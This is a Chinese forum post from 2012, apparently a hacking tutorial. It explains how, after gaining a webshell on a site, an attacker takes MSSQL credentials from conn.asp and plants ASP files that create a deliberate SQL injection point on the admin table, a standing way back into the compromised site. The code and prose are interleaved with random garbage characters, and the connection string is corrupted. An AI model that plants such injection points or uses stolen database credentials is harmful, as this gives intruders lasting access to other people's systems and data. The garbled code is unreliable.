首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:: { ~- O3 y, |% z# S
ASP/Visual Basic代码2 z" O; q5 \8 ~. {
<!--#include file="xx.asp"-->
) D; @6 |4 a R3 w% l; ?<%
0 ~0 x: ]" r$ [4 Q3 k M8 lset rs=server.createobject("ADODB.recordset") + o) J1 g+ j" S3 y! r3 ]3 I
id = request("id")
4 J9 E) p- _+ JstrSQL = "select * from admin where id=" & id
}% ?$ y$ h& Qrs.open strSQL,conn,1,3 2 e& M! W3 r1 M" P0 M4 b) H
rs.close
+ e0 s$ U0 z9 Q/ @%>
$ W3 S4 U9 v& f& |! A G把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!: `0 F2 h/ Y+ `0 G" F$ P" a
然后就要构造一个连接数据库的文件了,代码如下:7 D8 q; G. ]' T1 \4 J
ASP/Visual Basic代码
" \0 ? s6 ]/ _. b6 j" L<%
$ \2 M7 C# Z/ D) Q) QstrSQLServerName = "000.000.000.000" '服务器名称或地址 W" b E8 h& Y0 [9 C
strSQLDBUserName = "sqlname" '数据库帐号
, d3 }1 {$ V4 T0 ystrSQLDBPassword = "sqlpass" '数据库密码
( K! v9 n* y* w7 a; PstrSQLDBName = "sqldataname" '数据库名称 5 i3 `0 F0 w/ V8 A( u% I
Set conn = Server.CreateObject("ADODB.Connection")
6 t N1 y& a7 n% p2 R+ l* S' \* \ VstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" 2 j; t4 H* b: M1 u
conn.open strCon
: x$ T- o2 B( z& E9 ~%> / o8 r9 d' l, z
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功! _" O' [2 M8 N3 U& ]% |
|
发表于 2012-9-13 17:53:08
收藏
支持
反对